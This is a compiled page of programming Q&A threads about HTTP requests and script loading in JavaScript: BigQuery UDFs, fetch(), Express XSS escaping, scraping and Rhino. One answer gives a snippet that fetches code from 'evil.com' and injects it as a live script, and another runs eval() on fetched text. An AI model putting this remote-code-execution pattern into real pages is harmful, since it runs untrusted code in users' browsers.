New to user-defined UDFs, so excuse if this is a dumb question.
Can I use a standard http library to make a request FROM a BigQuery function?
Basically I want to be able to make a function that's available from SQL, that will trigger an external service over http.
I've tried both import and require for the http library in my custom function, but both fail when running the Javascript in BigQuery.
'use strict';
function https(){
let res = '';
http = require('http');
http.get('https://google.com'), (resp) => {
let data = "";
resp.on('end', () => {
res = "pinged";
});
};
return res;
};
Thanks in advance!
As Elliott Brossard said, this isn't possible.
The solution I wound up with is having a library of UDF Javascript functions, and then having another Javascript library which consumes this same code. The outer library handles all the web traffic stuff.
Related
Lower intermediate JS/JQ person here.
I'm trying to escape callback hell by using JS fetch. This is billed as "the replacement for AJAX" and seems to be pretty powerful. I can see how you can get HTML and JSON objects with it... but is it capable of running another JS script from the one you're in? Maybe there's another new function in ES6 to do:
$.getScript( 'xxx.js' );
i.e.
$.ajax({ url : 'xxx.js', dataType : "script", });
...?
later, response to Joseph The Dreamer:
Tried this:
const createdScript = $(document.createElement('script')).attr('src', 'generic.js');
fetch( createdScript )...
... it didn't run the script "generic.js". Did you mean something else?
Fetch API is supposed to provide promise-based API to fetch remote data. Loading random remote script is not AJAX - even if jQuery.ajax is capable of that. It won't be handled by Fetch API.
Script can be appended dynamically and wrapped with a promise:
const scriptPromise = new Promise((resolve, reject) => {
const script = document.createElement('script');
document.body.appendChild(script);
script.onload = resolve;
script.onerror = reject;
script.async = true;
script.src = 'foo.js';
});
scriptPromise.then(() => { ... });
SystemJS is supposed to provide promise-based API for script loading and can be used as well:
System.config({
meta: {
'*': { format: 'global' }
}
});
System.import('foo.js').then(() => { ... });
There are a few things to mention on here.
Yes, it is possible to execute a javascript just loaded from the server. You can fetch the file as text and user eval(...) while this is not recommended because of untrackeable side effects and lack of security!
Another option would be:
1. Load the javascript file
2. Create a script tag with the file contents (or url, since the browser caches the file)
This works, but it may not free you from callback hell perse.
If what you want is load other javascript files dinamically you can use, for example requirejs, you can define modules and load them dinamically. Take a look at http://requirejs.org/
If you really want to get out of the callback hell, what you need to do is
Define functions (you can have them in the same file or load from another file using requirejs in the client, or webpack if you can afford a compilation before deployment)
Use promises or streams if needed (see Rxjs https://github.com/Reactive-Extensions/RxJS)
Remember that promise.then returns a promise
someAsyncThing()
.then(doSomethingAndResolveAnotherAsncThing)
.then(doSomethingAsyncAgain)
Remember that promises can be composed
Promise.all(somePromise, anotherPromise, fetchFromServer)
.then(doSomethingWhenAllOfThoseAreResolved)
yes u can
<script>
fetch('https://evil.com/1.txt').then(function(response) {
if (!response.ok) {
return false;
}
return response.blob();
}) .then(function(myBlob) {
var objectURL = URL.createObjectURL(myBlob);
var sc = document.createElement("script");
sc.setAttribute("src", objectURL);
sc.setAttribute("type", "text/javascript");
document.head.appendChild(sc);
})
</script>
dont listen to the selected "right" answer.
Following fetch() Api works perfectly well for me, as proposed by answer of #cnexans (using .text() and then .eval()). I noticed an increased performance compared to method of adding the <script> tag.
Run code snippet to see the fetch() API loading async (as it is a Promise):
// Loading moment.min.js as sample script
// only use eval() for sites you trust
fetch('https://momentjs.com/downloads/moment.min.js')
.then(response => response.text())
.then(txt => eval(txt))
.then(() => {
document.getElementById('status').innerHTML = 'moment.min.js loaded'
// now you can use the script
document.getElementById('today').innerHTML = moment().format('dddd');
document.getElementById('today').style.color = 'green';
})
#today {
color: orange;
}
<div id='status'>loading 'moment.min.js' ...</div>
<br>
<div id='today'>please wait ...</div>
The Fetch API provides an interface for fetching resources (including across the network). It will seem familiar to anyone who has used XMLHttpRequest, but the new API provides a more powerful and flexible feature set. https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
That's what it's supposed to do, but unfortunately it doesn't evaluate the script.
That's why I released this tiny Fetch data loader on Github.
It loads the fetched content into a target container and run its scripts (without using the evil eval() function.
A demo is available here: https://www.ajax-fetch-data-loader.miglisoft.com
Here's a sample code:
<script>
document.addEventListener('DOMContentLoaded', function(event) {
fetch('ajax-content.php')
.then(function (response) {
return response.text()
})
.then(function (html) {
console.info('content has been fetched from data.html');
loadData(html, '#ajax-target').then(function (html) {
console.info('I\'m a callback');
})
}).catch((error) => {
console.log(error);
});
});
</script>
I know that this could be a very stupid question, but, since I'm totally new to Javascript, I'm not sure about how to do this. I want to write a script and run it through node on my laptop, and, in this script, I want to interact with a web page in order to use functions like document.getElementById and stuff like that.
In Python one could do this by using something like Beautiful Soup or requests, but how do you do this in Javascript?
I have implemented a crawler using cheerio and request-promise as follows:
https://www.npmjs.com/package/cheerio
let request = require('request-promise');
let cheerio = require('cheerio');
request = request.defaults({
transform: function (body) {
return cheerio.load(body);
}
});
// ... omitted
request({uri: 'http://example.org'})
.then($ => {
const element = $('.element-with-class');
});
I'm new to ExpressJs. I have a question about posted javascript
app.get('/nothing/:code',function(req, res) {
var code = req.params.code;
res.send(code)
});
If I POST javascript tag, It would run. Is there way to prevent that?
There are many possible HTML sanitizers out there (as simple search on NPM will give you a listing that you can use in your nodejs code).
The most simple would be to simply use the built in "escape" function, but that won't stop many XSS attacks.
app.get('/nothing/:code',function(req, res) {
var code = escape(req.params.code);
res.send(code)
});
A better solution would be to use a library designed for this purpose. For example if you used the santizier library (Google Caja's HTML sanitizer packaged for node):
var sanitizer = require('sanitizer');
...
app.get('/nothing/:code',function(req, res) {
var code = sanitizer.sanitize(req.params.code);
res.send(code)
});
I'm downloading a webpage using the request module which is very straight forward.
My problem is that the page I'm trying to download has some async scripts (have the async attributes) and they're not downloaded with the html document return from the http request.
My question is how I can make an http request with/with-out (preferably with) request module, and have the WHOLE page download without exceptions as described above due to some edge cases.
Sounds like you are trying to do webscraping using Javascript.
Using request is a very fundemental approach which may be too low-level and tiome consuming for your needs. The topic is pretty broad but you should look into more purpose built modules such as cheerio, x-ray and nightmare.
x-ray x-ray will let you select elements directly from the page in a jquery like way instead of parsing the whole body.
nightmare provides a modern headless browser which makes it possible for you to enter input as though using the browser manually. With this you should be able to better handle the ajax type requests which are causing you problems.
HTH and good luck!
Using only request you could try the following approach to pull the async scripts.
Note: I have tested this with a very basic set up and there is work to be done to make it robust. However, it worked for me:
Test setup
To set up the test I create a html file which includes a script in the body like this: <script src="abc.js" async></script>
Then create temporary server to launch it (httpster)
Scraper
"use strict";
const request = require('request');
const options1 = { url: 'http://localhost:3333/' }
// hard coded script name for test purposes
const options2 = { url: 'http://localhost:3333/abc.js' }
let htmlData // store html page here
request.get(options1)
.on('response', resp => resp.on('data', d => htmlData += d))
.on('end', () => {
let scripts; // store scripts here
// htmlData contains webpage
// Use xml parser to find all script tags with async tags
// and their base urls
// NOT DONE FOR THIS EXAMPLE
request.get(options2)
.on('response', resp => resp.on('data', d => scripts += d))
.on('end', () => {
let allData = htmlData.toString() + scripts.toString();
console.log(allData);
})
.on('error', err => console.log(err))
})
.on('error', err => console.log(err))
This basic example works. You will need to find all js scripts on the page and extract the url part which I have not done here.
I'm trying to use the Mozilla/Rhino js engine to test some SOAP requests in the command line. However, none of the normal objects for making requests (XMLHttpRequest, HttpRequest) seem to be available. Why is this? Can I import libraries?
I was able to get it to work using just Rhino with the following code.
var post = new org.apache.commons.httpclient.methods.PostMethod("https://someurl/and/path/");
var client = new org.apache.commons.httpclient.HttpClient();
// ---- Authentication ---- //
var creds = new org.apache.commons.httpclient.UsernamePasswordCredentials("username", "password");
client.getParams().setAuthenticationPreemptive(true);
client.getState().setCredentials(org.apache.commons.httpclient.auth.AuthScope.ANY, creds);
// -------------------------- //
post.setRequestHeader("Content-type", "application/xml");
post.setRequestEntity(new org.apache.commons.httpclient.methods.StringRequestEntity(buildXML(), "text/plain", "ASCII" ));
var status = client.executeMethod(post);
var br = new java.io.BufferedReader(new java.io.InputStreamReader(post.getResponseBodyAsStream()));
var response = "";
var line = br.readLine();
while(line != null){
response = response + line;
line = br.readLine();
}
post.releaseConnection();
You might possibly find a library to import, you could also write your own in Java and make them available to your rhino instance, depending on how your are using it. Keep in mind Rhino is just a Javascript language engine. It doesn't have a DOM, and is not inherently 'web aware' so to speak.
However, since it sounds like you are doing this for testing/experimentation purposes, and you will probably be more productive not having to reinvent the wheel to do so, I will strongly, strongly suggest that you just download Node.js and look into the request module (for making HTTP requests) or any of the various SOAP modules.
You can do a ton more with Node.js, but you can also use it as a very simple runner for Javascript files as well. Regardless you should move away from Rhino though. It is really old and not really supported anymore, especially now that with JDK8 even the javax.script support will switch to the Nashorn engine.
UPDATE: If you really want to give it a go (and if you are prepared to monkey around with Java), you might look at this SO question and its answers. But unless you are something of a masochist, I think you'll be happier taking a different path.
I was actually able to do this using Orchestrator 5.1 with the 'Scriptable task' object to interface with the Zabbix API:
var urlObject = new URL(url);
var jsonString = JSON.stringify({ jsonrpc: '2.0', method: 'user.login', params: { user: 'username', password: 'password' }, id: 1 });
urlObject.contentType = "application/json";
result = urlObject.postContent(jsonString);
System.log(result);
var authenticationToken = JSON.parse(result).result;